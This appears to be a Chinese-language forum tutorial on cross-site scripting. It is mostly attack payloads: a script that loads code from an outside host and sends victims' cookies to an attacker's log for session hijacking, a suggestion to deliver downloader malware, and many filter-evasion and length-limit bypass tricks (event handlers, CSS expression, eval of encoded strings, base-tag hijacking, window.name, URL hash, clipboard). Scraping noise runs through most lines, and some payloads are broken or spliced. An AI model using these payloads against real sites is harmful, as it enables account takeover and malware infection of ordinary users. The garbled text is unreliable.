XSS跨站脚本攻击的基本原理和SQL 注入攻击类似(个人观点),都是利用系统执行了未经过滤的危险代码,不同点在于XSS是一种基于网页脚本的注入方式,也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的,属于客户端攻击。而SQL注入攻击将危险代码绕过正常的文本输入变为可执行的SQL执行语句从而操纵数据库,从而进一步探测、操纵数据库信息。属于服务器攻击?(菜鸟看法)。
/ Q9 |" F" B3 T" J2 t! G5 yXSS攻击前奏(XSS bug 检测)/ A& {/ ~1 o \) [( H/ l
1、最常见的最经典的XSS bug检测语句必然是
- l" i2 Q! P, F8 \% ?7 B. d: r, D <script>alert(/XSS/)</script> ①
" w( I) x0 J0 L* M9 U 比如在存在XSS bug的留言板上写上留言①,当访问留言板网页时会弹出对话框:$ I* k; S& C5 G( J. l3 Q
: R2 `$ O2 Z- u" A4 T% ]1 A这表明我们输入的语句被原样写入的网页并被浏览器执行了.那么我们就有机会执行我们的脚本攻击载荷:
4 E5 ^& r8 z" _( y<script src = http://www.labsecurity.org/xssbug.js></script>
9 O4 ^, D/ b! X# ^/ C在我们的网络空间www.labsecurity.org上的xssbug.js代码可以是6 p& P! b/ e+ ~4 Z' q
Var img = document.createElement(“img”);
, C! r/ e# L6 J" J/ wImg.src = “http://www.labsecurity.org/log?”+escape(document.cookie);& f A/ J$ e: B. v7 V7 u
document.body.appendChild(img);
/ {/ x9 C; d0 n3 B6 N+ d" D如果我们如上代码顺利执行,那么被攻击者在目标网站的登录cookie就写进了log.得到其cookie后,进行浏览器重新发包就可以以被攻击者身份登录目标网站.(被攻击者可以是普通用户也可以使网站超级管理员).2 B4 T# @2 t4 @8 i0 x+ [
将窃取cookie的代码换成下载者地址就可以将下载者下载到存在下载者攻击漏洞的用户电脑上.
+ S. K5 E' F6 t% e) ~; d 也可以将代码换成目标用户在网站上的某些操作的 数据包脚本.促使在不知情的情况下”自愿”进行某些操作.
7 P, Y) |8 c$ g6 n2 U2 ?; {# {6 R. \ 对于Cookie窃取的防御可以使IP绑定等方案了.( ?) u3 L* Q: l2 e
, U8 |4 e5 |0 K" o
既然存在XSS攻击那么程序员在开发时必然会进行某些危险关键字的过滤,以及限制用户的输入长度.这样即使存在xss漏洞.Hack也只能检测,却不能够写入攻击载荷(长度限制啊).* r g' V) k' U5 I
利用IMG图片标记属性跨站
/ t9 X$ I9 y& s+ Q5 d9 r$ q当然也可以像上面所说的在留言板中输入
^# c* Z$ }! `! u<img src=”javacript:alert(/XSS/)”></img>
7 O# D, `0 ~/ _* w这所说的不是这样是在用户上传图片时将图片路径修改为一段可执行的XSS测试脚本.( H' V, ?7 w3 A1 j
如果存在XSS漏洞那么此类脚本就会被执行.这类脚本要闭合双引号”>”等.
' H+ E, ~# q1 w/ t8 P6 l& o 利用DIV标签属性跨站
5 w; T8 c9 {6 T* ~8 z. u% L5 D9 K<div style=”width:0;height:0;background:url(javascript:document.body.onload = function(){alert(/XSS/);};”></div>; W+ u" d) S' f8 T( g
利用已知事件攻击
% {! U! v7 S b0 Z% w, I移动特效字<marquee>文字</marquee>
4 [! Y6 Z9 ~" l; i- [4 B0 J& p, [ <marquee onsB.<div style=”” onmouseenter=”alert(/XSS/)”>文字</div>
$ L' w8 I$ w* n i; T8 ^ 构造事件
0 K) V+ J! M* D4 U7 n<img style=”#” style=”TEST:e­xpression(alert(/XSS/));”>. i! D2 I# K$ ]! j( z2 O) P- y
常用的事件构造
/ b: e) I* J$ S5 B) d+ r. n- }<font style = “TEST:e­xpression(alert(/XSS/))”></font>, C8 f9 L: ? s! @. d
<li style = “TEST:e­xpression(alert(/XSS/))”></li>: l7 v0 t3 C1 J* ^; ]+ N
<table style = “TEST:e­xpression(alert(/XSS/))”></table>- q- G) ]2 |0 H! L. @- e
<a style = “TEST:e­xpression(alert(/XSS/))”></a>
( Z( |2 X) H2 a' g1 `<b style = “TEST:e­xpression(alert(/XSS/))”></b>. T4 U1 H" R% S$ L: Z" ^2 g
<ul style = “TEST:e­xpression(alert(/XSS/))”></ul>" j/ m3 [9 N7 G( S5 c% F1 a9 W
<marque tyle = “TEST:e­xpression(alert(/XSS/))”></marquee>
9 Q1 q2 d% U- g2 z* Z# p/ f突破程序员的过滤限制; H/ Q b$ S+ U+ t. Q/ y3 x" V
利用javascript换行与空格突破过滤
$ A' t0 m( L. b5 J8 V' @ <img src = j ava script:al er t(/XSS/)>///空格使用Tab键产生9 k* ?" q2 S9 J( m7 Q
<img src = j/ E9 h4 x2 Z" M* O) c7 T- l
ava script :a ler t(/xss/)>
" u' p7 F) O0 J f1 [$ w 利用注释<img src = “#”/**/onerror = alert(/XSS/)># L% q2 E1 B" u9 }
转代码,绕过滤( U/ q3 I0 Q j
使用大小写转换绕过过滤/ T* a- y" r+ j
使用进制编码; Q V. M. ~1 [( L# r, T' M4 V8 h; Z
空格回车符0 q& C1 F' p0 }" V8 }$ ^( T' _2 |% I# }
* K9 A; D0 d/ Q) m) X/ u6 T
JS 还原函数法
: j J/ L9 Z8 H- X' \# t String.fromCharCode()可以将ASCII编码还原成字符串,那么就可以eval(String.fromCharCode(97,108,101.....))
" v y' N$ E9 g突破长度限制
) E, X& X2 H$ f4 f注释符闭合相邻的输入框达到合并的目的0 [% [+ ^. F' ~8 F. B/ o
<input id = 1 type = “text” value=””/>6 ]2 I0 p( j( U/ [3 |2 d
<input id = 2 type = “text” value = “”/>- s6 D- O" u9 r' _6 K
这样我们可以在第一个框中输入”>alert<!--$ W' n; c7 U4 x! a' O
在第二个输入框中输入--><script>(/XSS/);</script>
: h8 \ {. Z* J$ U4 D, E. q这样效果就是
; c b6 W0 ?! ]<input id = 1 type = “text” value=”” <script>alert(/XSS/)</script>”/>
$ p4 b7 B- H" v使用<base>标签进行相对路径劫持
. Y; i1 @6 p! Y6 U+ q+ h3 H) `<body>tart=”alert(/XSS/)”>文字</marquee>1 Q/ P: c6 K1 t5 |$ f, ?
<base href=”http://www.labsecurity.org”/>
4 ]9 ]4 D3 {1 C, t7 b3 s<img src = “evil.js”>
6 T( O) @' x1 J# p( W<body>
) N: J' n( P' T$ ~# _当我们没有使用base标签时evil.js是调用的服务器根目录下的evil.js脚本文件.当我们使用<base>脚本后.那么在此标签后的所有相对路径为我们设置的网站.
' |5 e) g+ s% Z8 ?; B因此可以先使用<base>脚本劫持,然后再写入<img src=”xxx.js”>突破长度限制.
% I8 v- U% B, P5 W+ P+ h使用window.name进行字符串传递) N Y- Y+ d- H5 r! Y8 \9 j% T+ \
在我们自己的构造的页面中写入如下代码" d0 K' a# d# d9 u, |& L+ L3 J, I
<script>
" G1 Q2 e1 R" L" n; H* O/ e4 t) PWindow.name=”<script src=http://www.labsecurity.org/xss.js><script>”
2 e/ [+ e/ I- ~, ?. z9 ZWindow.location=”http://www.xxxx.com/xxx.asp”5 }$ f7 N% z& `0 l; a& v
</script> S5 f& j* i& d$ k# x5 {% }1 P3 @
当我们跳转到目标网页时我们的window.name值为我们设置的跨站脚本语句.
$ I. ?; Y) M0 m3 R! V因此我们可以使用eval(name)进行跨站攻击.
2 ]! C/ a+ H- r" O$ ^1 b7 M利用上下文扩展长度" u k6 ?% m; G: ^- \* n" Z. k% r
<div id="x">alert%28document.cookie%29%3B</div>
6 K5 }7 B+ U6 U0 _" [! Y( _<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
4 C4 a- w) Q; r0 h( L上文是不限制长度的安全数据,那么我们就可以在下文中使用此安全数据.进行XSS攻击突破长度.% ?+ Z$ |/ n' E) C. o
5.利用URL 中的数据1 g* ]7 B1 S Q; S4 ?
如果页面里不存在上一节所说的可控HTML 上下文数据怎么办?有些数据是我们无条件可控的,第一个想到的就是URL,通过在URL 的尾部参数构造要执行的代码,然后在XSS点通过
( d3 [$ R% \" p ~/ g I. C" Fdocument.URL/location.href 等方式获得代码数据执行,这里假设代码从第80 个字符开始到( M1 f' x! R" G+ W: L d
最后:7 i q0 f, i$ R1 L
--code-------------------------------------------------------------------------
" M2 W! U* g: b* d9 phttp://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
& J' j/ e/ b9 u# n% t) {<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
% a% t3 F; `) ^/ R, t( k- N长度:30
+ o" T/ v- L/ E; h8 R. a3 k8 L! x7 \<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
. F. `$ z% z. y, U4 K" J0 Z长度:31
, h; j1 K M; Y& f6 F上面两个例子对比,前一个例子更短,那么有没有办法更短呢?通过查阅Javascript 手册
+ R: G a, ?4 R) m( L5 t的String 的方法可以发现,切割字符串有一个更短的函数slice,5 个字符比substr 还要短一个字符:
G& M9 A9 E0 Q: Y% z$ J4 Q<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
$ D$ ]9 y, s, b! y长度:29
3 b9 V; n# q& Y0 `( B* T<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>' D6 e+ p9 V! y
长度:301 y& F2 D$ Y- G1 z# U1 }& U1 k6 g: w
那么还有没有办法更短呢?答案是YES,查阅一下MSND 里的location 对象的参考你会发现有个hash 成员,获取#之后的数据,那么我们可以把要执行的代码放在#后面,然后通过hash获得代码执行,由于获得的数据是#开头的,所以只需要slice 一个字符就可以拿到代码:/ D9 C2 k/ W# F2 a$ g5 |
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
2 n& s8 h; x- @) z) X3 R* i& S* c<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>- @: p M6 z3 ?) A' z9 A5 d1 q
长度:29. n! u& q. w+ v t" D9 k
这样比上面的例子又少了一个字符。那么还可以更短么?; s) ~0 t8 O/ m$ \1 D3 g
6.剪切板clipboardData0 }0 h! n! H. K! N+ n
攻击者在自己域的页面上通过clipboardData 把Payload 写入剪切板,然后在被XSS 页面获取并执行该数据。攻击者构造的页面:# L. y# a, v Y( |% k
--code-------------------------------------------------------------------------3 H; u8 N% |. t2 X% Z4 B7 s7 d
<script>
. s2 F, C3 @0 @9 [ w6 h7 ?clipboardData.setData("text", "alert(document.cookie)");
+ u. j) m) B/ f3 J6 t% o V( L: a( h</script>6 X0 i. F, c; y5 Z
-------------------------------------------------------------------------------% T' J* J6 K( m) p- `
被XSS 的页面:3 |" X; A# M/ j! |# H7 N
--code-------------------------------------------------------------------------
3 T* Z- P2 G; r7 V5 K$ b5 S<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>" z0 X2 {1 _0 O
-------------------------------------------------------------------------------/ _" \7 Y- t$ m4 a
长度:365 i% Z5 \! _0 o; J
这种方式只适用于IE 系列,并且在IE 7 及以上版本的浏览器会有安全提示 |